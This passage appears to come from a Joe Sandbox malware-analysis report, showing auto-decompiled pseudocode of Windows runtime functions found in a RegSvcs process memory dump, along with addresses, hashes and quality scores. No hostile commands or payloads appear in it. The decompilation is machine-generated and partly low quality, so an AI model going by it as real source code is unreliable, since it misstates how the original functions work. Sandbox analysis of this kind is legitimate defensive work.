							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E018D76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L018E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x018ffd9b
0x018ffda0
0x018ffda1
0x018ffdab
0x018ffdad
0x018ffdb0
0x018ffdb8
0x018ffe0f
0x018ffde6
0x018ffde9
0x018ffdec
0x0193c0c0
0x018ffdfe
0x018ffe06
0x018ffe06
0x0193c0c8
0x018ffe2d
0x018ffe2d
0x00000000
0x018ffe2d
0x0193c0d1
0x0193c0e0
0x0193c0e5
0x0193c0e5
0x0193c0e8
0x00000000
0x0193c0e8
0x018ffdf4
0x00000000
0x00000000
0x018ffdf6
0x018ffdfa
0x018ffe1a
0x018ffe1f
0x018ffe1f
0x018ffdfc
0x00000000
0x018ffdfc
0x018ffdcc
0x018ffdd0
0x018ffe26
0x00000000
0x018ffe26
0x018ffdd8
0x018ffddb
0x018ffddd
0x018ffde0
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 55833acd375a4fe09ac1eced5e8edfd76f39e0d989db39eedcbaed6d1b682b87
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 1C21A972A00A44DBDB31CF0DC540A62F7E5EB94B10F20806EEB49CB651D730AE00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 018FB390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E018FB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E018E2280(_t12, 0x19b8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E019000C2(0x19b8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x018fb395
0x018fb3a2
0x018fb3a5
0x018fb3aa
0x018fb3b2
0x018fb3ba
0x018fb3bd
0x018fb3c0
0x018fb3c4
0x018fb3c9
0x0193a3e9
0x0193a3ed
0x0193a3f0
0x0193a3ff
0x0193a403
0x0193a409
0x00000000
0x00000000
0x0193a40b
0x0193a40b
0x0193a40f
0x0193a415
0x0193a423
0x0193a423
0x0193a415
0x018fb3d1
0x018fb3e8
0x018fb3e8
0x018fb3d9

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4fb955d4cafd87328081bad866217c55b0e0a7d1a8fd319cb8b45c61cf69070
Instruction ID: 8294fd4035180608691615b6693538990e535b6ff3258a195a9c07ff47a28672
Opcode Fuzzy Hash: c4fb955d4cafd87328081bad866217c55b0e0a7d1a8fd319cb8b45c61cf69070
Instruction Fuzzy Hash: CA1148333552149BCB19CA18CE81A6BB2DAEBC9730B28012DDE1AC7380C9319D02C694

Uniqueness

Uniqueness Score: -1.00%

Function 018C9240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E018C9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x199f708);
				E0191D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E019095D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E019095D0();
				_t33 =  *0x19b84c4; // 0x0
				L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x19b84c4; // 0x0
				L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x19b84c4; // 0x0
				E018E2280(L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x19b86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E019095D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E019095D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E018C9325();
					_t50 =  *0x19b84c4; // 0x0
					return E0191D0D1(L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x018c9240
0x018c9242
0x018c9247
0x018c924c
0x018c924e
0x018c9255
0x018c9257
0x018c925a
0x018c925f
0x018c925f
0x018c9266
0x018c9271
0x018c9276
0x018c9279
0x018c927e
0x018c9295
0x018c929a
0x018c92b1
0x018c92b6
0x018c92d7
0x018c92dc
0x018c92e0
0x018c92e6
0x018c92e8
0x018c92ee
0x018c9332
0x018c9333
0x018c9337
0x018c9338
0x018c933a
0x018c933a
0x018c933d
0x018c9342
0x018c9342
0x018c9345
0x018c9349
0x018c934e
0x018c9352
0x018c9357
0x018c92f4
0x018c92f4
0x018c92f6
0x018c92f9
0x018c9300
0x018c9306
0x018c9324
0x018c9324

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 20c7270c1b5910de79efeac7ec89988f3ea9c7712310227cab6aa7436ed732f7
Instruction ID: 8c8d3c03f51f45e3d8cb2a17b23c6073a6248bb53b74a3155c34ae002eca2f28
Opcode Fuzzy Hash: 20c7270c1b5910de79efeac7ec89988f3ea9c7712310227cab6aa7436ed732f7
Instruction Fuzzy Hash: B0213932451A01DFC726EF68CA44F59B7F9BF18B08F1445ACE04DC66A2CB39EA41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 01954257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E01954257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x19a08d0);
				E0191D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E019541E8(__ebx, __edi, __ecx, _t39);
				E018DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x19b87e4;
					_t18 =  *0x19b87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x19b5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x19b87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x19b87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L018C7055(_t31 + 0xfffffff8);
								_t24 =  *0x19b87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x19b87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x19b5cd0;
				if( *0x19b5cd0 <= 0) {
					L018C7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x19b87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x19b87e8 = _t30;
						 *0x19b87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0191D0D1(L01954320());
			}

0x01954257
0x01954257
0x01954257
0x01954259
0x0195425e
0x01954263
0x01954265
0x01954273
0x01954278
0x0195427c
0x0195427f
0x01954281
0x01954287
0x019542d7
0x019542d7
0x019542da
0x0195428d
0x0195428d
0x0195428f
0x01954292
0x01954297
0x0195429c
0x019542a0
0x019542a6
0x019542a8
0x019542ae
0x019542b3
0x00000000
0x019542ba
0x019542ba
0x019542bf
0x019542c5
0x019542ca
0x019542cf
0x019542d0
0x00000000
0x019542d0
0x019542b3
0x00000000
0x019542a6
0x0195429c
0x019542dc
0x019542dc
0x019542e3
0x01954309
0x019542e5
0x019542e5
0x019542e8
0x019542ee
0x019542f0
0x00000000
0x019542f2
0x019542f2
0x019542f4
0x019542f7
0x019542f9
0x01954300
0x01954300
0x019542f0
0x0195430e
0x0195431f

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8647b405b46d3037a7d5794c6f81d094319df1a35749cd5ef1d7709f29367ca7
Instruction ID: 5b9882c946c39afa68a95f16bfe5fc2502bf319d35f426131e554802a822445c
Opcode Fuzzy Hash: 8647b405b46d3037a7d5794c6f81d094319df1a35749cd5ef1d7709f29367ca7
Instruction Fuzzy Hash: 3C219D70504601CFC7E5DF68D680A14BBF9FB8939AB2082AEC50D9B699EB31C5D2CB41

Uniqueness

Uniqueness Score: -1.00%

Function 018F2397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E018F2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x19b848c != 0) {
					L018EFAD0(0x19b8610);
					if( *0x19b848c == 0) {
						E018EFA00(0x19b8610, _t19, _t27, 0x19b8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E018F2581(0x19b8610, 0x18a50a0, _t26, _t27, _t28);
						E018EFA00(0x19b8610, 0x18a50a0, _t27, 0x19b8610);
					}
				} else {
					L1:
					_t11 =  *0x19b8614; // 0x0
					if(_t11 == 0) {
						_t11 = E01904886(0x18a1088, 1, 0x19b8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E018F2581(0x19b8610, (_t11 << 4) + 0x18a5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x018f23b0
0x018f23b6
0x018f2409
0x018f2415
0x01935ae9
0x00000000
0x018f241b
0x018f241b
0x018f241d
0x018f2427
0x018f242e
0x018f2430
0x018f2430
0x018f23b8
0x018f23b8
0x018f23b8
0x018f23bf
0x018f23fc
0x018f23fc
0x018f23c1
0x018f23c3
0x018f23d0
0x018f23d8
0x018f23d8
0x018f23dc
0x018f23de
0x018f23e1
0x018f23e1
0x018f23ec

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cebb5a7fc84a49f15731b39bc8a2b43166f6216d7b95a5a8f73d10bd960299a7
Instruction ID: 684350da06494ab80f618aaf66d278e4d64b4ce693f1983ca8ab333d4f9621ff
Opcode Fuzzy Hash: cebb5a7fc84a49f15731b39bc8a2b43166f6216d7b95a5a8f73d10bd960299a7
Instruction Fuzzy Hash: 65118972744301ABE730A62D9CC4B1AB6CFFBA4720F14442EF706DB290C6B4EA45C755

Uniqueness

Uniqueness Score: -1.00%

Function 019446A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E019446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L018E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0190F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E018FD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L018E77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x019446b7
0x019446ba
0x019446c5
0x019446c8
0x019446d0
0x019446d4
0x019446e6
0x019446e9
0x019446f4
0x019446ff
0x01944705
0x01944706
0x0194470c
0x01944713
0x0194471b
0x01944723
0x01944725
0x019446d6
0x019446d9
0x019446db
0x019446db
0x01944732

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 39499f35a1c3f90f72fb2d9100495a91c31e595c7e95a03374cf629de9938b32
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 7C11C272504208BBCB159F5C9880DBEB7B9EF95310F10806AF948C7351DA319E55D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 019037F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E019037F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E018E2280(_t6, 0x19b8550);
				}
				_t29 = E0190387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E018DFFB0(0x19b8550, _t27, 0x19b8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x019037fa
0x019037fc
0x01903805
0x01903808
0x01903808
0x01903814
0x01903818
0x01903846
0x01903848
0x0190384b
0x0190384b
0x01903852
0x00000000
0x01903854
0x01903856
0x00000000
0x00000000
0x01903863
0x00000000
0x01903863
0x0190381a
0x0190381a
0x0190381f
0x0190386e
0x0190386e
0x01903871
0x01903873
0x01903873
0x01903868
0x00000000
0x01903868
0x01903821
0x01903826
0x00000000
0x00000000
0x01903828
0x0190382a
0x01903841
0x00000000
0x01903841

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55eee5b75f124b6775d380086be9ec026986a224784f9d0ba28c7e46637a6202
Instruction ID: b70bf71ba48ccbd6998acc4057245d7d7e97fe00f1f37b08f3293f49a542b439
Opcode Fuzzy Hash: 55eee5b75f124b6775d380086be9ec026986a224784f9d0ba28c7e46637a6202
Instruction Fuzzy Hash: 540104729016119FC33B8A1D9940E26BBEAFF86B5171580E9ED0D8B281DB30CB01C7C2

Uniqueness

Uniqueness Score: -1.00%

Function 018F002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018F002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E018E7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E018E7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E018E7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E018E7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x018f0032
0x018f0037
0x018f0043
0x01934b3a
0x018f0049
0x018f0049
0x018f0049
0x018f004e
0x018f0053
0x01934b48
0x01934b5a
0x01934b4a
0x01934b53
0x01934b53
0x01934b5f
0x00000000
0x01934b61
0x00000000
0x01934b61
0x018f0059
0x018f0059
0x018f0060
0x01934b6f
0x01934b6f
0x018f0069
0x01934b83
0x00000000
0x00000000
0x01934b90
0x01934b9b
0x01934b9b
0x01934ba4
0x00000000
0x00000000
0x01934baa
0x00000000
0x018f006f
0x018f006f
0x00000000
0x018f006f
0x018f0069

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 3f3e757fe1747ae48c2ecf4714f6673c0830de884070e126c7a062beaee768ec
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 9011C2326026C5CFE726872CC548B393BE9AB81755F0A00A4EE08CB693E329C941C651

Uniqueness

Uniqueness Score: -1.00%

Function 018D766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E018D766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E018FF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E018FF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L018E4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x018d7672
0x018d767f
0x018d7689
0x018d76de
0x018d76de
0x018d768b
0x018d7691
0x018d7693
0x018d7697
0x00000000
0x018d7699
0x018d76a8
0x00000000
0x018d76aa
0x018d76ad
0x018d76b1
0x00000000
0x018d76b3
0x018d76b3
0x018d76b5
0x018d76ba
0x018d76bc
0x018d76bc
0x018d76c0
0x00000000
0x018d76c2
0x018d76ce
0x018d76ce
0x018d76c0
0x018d76b1
0x018d76a8
0x018d7697
0x018d76d9

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: b71430274049e9301a7ba9d31570c476c85f94c75fdd95ade3e00fa32663bd5e
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 5301843270021DABD7209E5EDC45E5B7BADEB84B64F280538BB08CB250EA30DE0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 018C9080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E018C9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x19b85ec;
				E018E2280(_t48, 0x19b85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E018DFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x19b538c; // 0x77576828
					if( *_t84 != 0x19b5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x199f6e8);
						E0191D0E8(0x19b85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E019988F5(_t80, _t85, 0x19b5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x19b86c0; // 0x13907b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x19b86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E018E2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E019988F5(0x19b85ec, _t85, 0x19b5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0190AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
